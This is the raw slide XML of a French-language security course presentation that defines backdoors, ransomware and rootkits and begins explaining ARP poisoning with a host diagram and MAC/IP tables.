            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (porte dérobée)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une application qui permet l'accès à distance et non autorisé à un système </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>informatique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il donne un contrôle quasi total à l'attaquant, qui peut effectuer un large éventail d'actions : </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>surveiller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, interférer, intercepter, modifier, capturer, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ils </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sont utilisés pour contourner les mécanismes de sécurité existants intégrés aux systèmes. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ils </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>peuvent également être plantés par des attaquants pour bénéficier d'un accès privilégié continu à un système une fois initialement compromis. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>portes dérobées sont généralement des types de logiciels malveillants autonomes qui ne se répliquent pas.</a:t>
            </a:r>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39</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3702138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menaces</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055913" y="805752"/>
            <a:ext cx="10080171" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Afin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de pouvoir sécuriser un système, il est nécessaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d’identifier les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>menaces potentielles, et donc de connaître et de prévoir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>la façon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de procéder de l’ « ennemi ». </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1"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4</a:t>
            </a:fld>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4828" y="2893443"/>
            <a:ext cx="5686836" cy="3828032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1096894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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="6111240" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ransomwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>cryptolocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>consituent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> une catégorie de malware qui vise à chiffrer les données et demander une rançon en échange de la clé de déchiffrement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ils se propagent et se multiplient principalement à travers les e-mail de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>phising</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ils peuvent également se répandre via des clés USB des systèmes vulnérables exposés sur internet ou une menace interne dans une entreprise</a:t>
            </a:r>
          </a:p>
          <a:p>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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2782" y="1707504"/>
            <a:ext cx="4996126" cy="3747094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20753956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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> sont un (ensemble de) programmes utilisés pour modifier la fonctionnalité standard du système d'exploitation afin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>masquer toute activité malveillante effectuée par celui-ci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ils remplacent généralement les utilitaires d'exploitation courants tels que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> par leur propre ensemble de programmes afin que toute activité malveillante soit filtrée avant d'afficher les résultats à l'écran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une fois installé, il masque le fait qu'un système a été compromis, permettant à l'attaquant d'obtenir un accès </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>l'ordinateur et, éventuellement, à d'autres machines du réseau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> peut être composé de logiciels espions et d'autres programmes qui surveillent le trafic et les frappes, créent une porte dérobée dans le système, modifient les fichiers journaux, attaquent d'autres machines sur le réseau, modifient les outils système existants pour échapper à la détection, etc.</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41</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40151123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Exemples d’attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Classification des attaques selon la cible</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagramme 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1827387523"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="410464" y="0"/>
          <a:ext cx="11232896"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79739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attaques réseaux</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="11178540" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poisonning</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Le principe du protocole ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le protocole de résolution d'adresse (ARP) est un protocole de communication utilisé pour découvrir l'adresse de la couche de liaison, telle que l'adresse MAC, étant donné une adresse IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le protocole ARP est un protocole très simple, et il n'implémente aucune mesure de sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>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43</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13972381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Attaques réseaux</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44</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5" descr="C:\Users\Abdou\AppData\Local\Microsoft\Windows\INetCache\Content.Word\switch-por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3764" y="3709592"/>
            <a:ext cx="884431" cy="334214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Groupe 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1141243" y="3491023"/>
            <a:ext cx="773743" cy="773743"/>
            <a:chOff x="17736" y="536836"/>
            <a:chExt cx="457350" cy="457363"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Image 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="17736" y="536836"/>
              <a:ext cx="457350" cy="457363"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="180000" y="600317"/>
              <a:ext cx="229870" cy="2286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900" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Groupe 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9948186" y="3492025"/>
            <a:ext cx="773743" cy="772668"/>
            <a:chOff x="5021631" y="637128"/>
            <a:chExt cx="457200" cy="457200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Image 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5021631" y="637128"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5203339" y="689954"/>
              <a:ext cx="229870" cy="22796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900">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Groupe 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5270620" y="1988909"/>
            <a:ext cx="792011" cy="811355"/>
            <a:chOff x="2061351" y="238056"/>
            <a:chExt cx="479671" cy="479714"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Image 9" descr="C:\Users\Abdou\Desktop\icons\pc-hack.png"/>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2061351" y="238056"/>
              <a:ext cx="479671" cy="479714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2225317" y="298673"/>
              <a:ext cx="229870" cy="2286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1200" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>C</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17" name="Tableau 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4220921559"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="118291" y="4393496"/>
          <a:ext cx="2798894" cy="928488"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="309496">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> A</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>aaaa:aaaa:aaaa</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18" name="Tableau 17"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="619709086"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9301933" y="4408654"/>
          <a:ext cx="2798894" cy="928488"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
